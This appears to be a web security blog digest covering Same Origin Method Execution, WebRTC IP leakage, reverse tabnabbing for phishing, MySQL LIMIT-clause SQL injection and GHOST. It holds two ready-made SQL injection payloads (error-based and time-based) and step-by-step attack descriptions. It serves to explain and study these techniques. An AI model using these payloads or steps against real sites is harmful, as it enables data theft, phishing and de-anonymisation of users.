Same Origin Method Execution - SOME

It's based on a talk Ben Hayak released in Black Hat 2014 - EU, Same Origin Method Execution (SOME) - Exploiting a callback for same origin policy bypass

Unfortunately presentation doesn't explain it well and I couldn't find a video of it.

Prerequisite - JSONP Recap

Classic JSONP usage allows you to call a given JavaScript function, i.e. and the response will be something like this igotthepower({"jsonp":"data"}). Which helps you to bypass Same Origin Policy.

  1. Find javascript function or an interaction that can be triggered by a simple call on the website. i.e. Do you want to trust this external component?, Do you want to share this? etc.
  2. Open a _blank to JSONP or similar place that can trigger the JavaScript function, i.e. You have to make this wait a bit so the page on the next step is finished when this call is finalized. You can do this by writing a small script that waits 3 seconds and then loads the page.
  3. Redirect the current page to the page that you want to trigger a JavaScript function such as Accept() , Share() to bypass the event, for example the page asks for confirmation fo "Accept" sharing a data or "Trust" a 3rd party.
  4. Now current page is the page that you want to press "Accept", JSONP page calls the given function by you i.e. window.opener.Accept. window.opener means the page that you want to bypass, it calls Accept JavaScript from the same origin hence no same origin issue, and voila!

You need to be aware that JSONP results need to be wrapped with <script> tags. This is not common design or behaviour, also content-type should be a JavaScript executable type. Bottom line is this is very hard to exploit in real world, it's quite interesting nonetheless.

Sample Codes for your lab:

Getting Public & Private IP Address with WebRTC

Appareantly with WebRTC it's quite easy to get internal & external IP Address(es) of a user. Code and more details.

This obviously can be used to bypass proxies etc. so can come quite useful to de-anonymize someone or to help launch a more precise attack to internal IP address. i.e. CSRF against user's router. You can easily find the subnet via using this trick and and launch the attack in a more precise manner.

Couple of notes:

  1. This is by design and won't be fixed anytime soon (at least in Chrome)
  2. It's a feature used for P2P connections with WebRTC
  3. You can disable STUN requests in Firefox, we don't anyway to do it in Chrome
  4. Tor Bundle doesn't come with WebRTC so Tor Bundle is not affected by it.
  5. STUN requests to find public IP Address are UDP request so if you are using a personal process level firewall

Window.opener.location - Phising and stuff...

window.opener.location can be overwritten from another origin. I have no idea why, you cannot read it, you can not read or write pretty much anything else but you can overwrite location (if anyone knows why, I would love to learn) however you can overwrite it.

So if the links to a website you control in a _blank window, you can call window.opener.location = '' and redirect the user to your website. In theory you can just replicate the original website and when user got back to that window he won't notice the that URL changed and will continue and enter his login etc.

SQL Injections in MySQL LIMIT clause

SQL Injections in MySQL LIMIT

Here is a sample,
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

Quite neat and straight forward. If you need Time Based SQL Injection then you'll need to use old school BENCHMARK appareantly sleep() doesn't work in here;

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

Server-side Request Forgery Attacks Cheatsheet / Guide

A very neat guide covering from basics to advanced SSRF attacks.

GHOST and Web Applications

Following the recent trends "hip-vulnerability names & logos" in the indsutry Qualys PR did a good job with GHOST. Not to undermine the vulnerability but we didn't see much impact from it just yet and many thinks we won't see much in the future. Even though Michal Zalewski's Technical analysis of Qualys' GHOST is making fun of the PR there are some truly interesting points in that post such as :

The image file modification date returned by the HTTP server at is Thu, 02 Oct 2014 02:40:27 GMT (Last-Modified, link). The roughly 90-day delay between the creation of the image and the release of the advisory probably corresponds to the industry-standard period needed to test the materials with appropriate focus groups.

Spiderlabs (bunch of smart guys in my experience) went after the obvious victim PHP and noticed that Wordpress Pingback feature can be used for testing GHOST.

This PoC allows users to remotely verify if a target web server is vulnerable to the CVE however it does not demonstrate exploitability.

So they managed to get a memory corruption but no one expects to exploit it yet.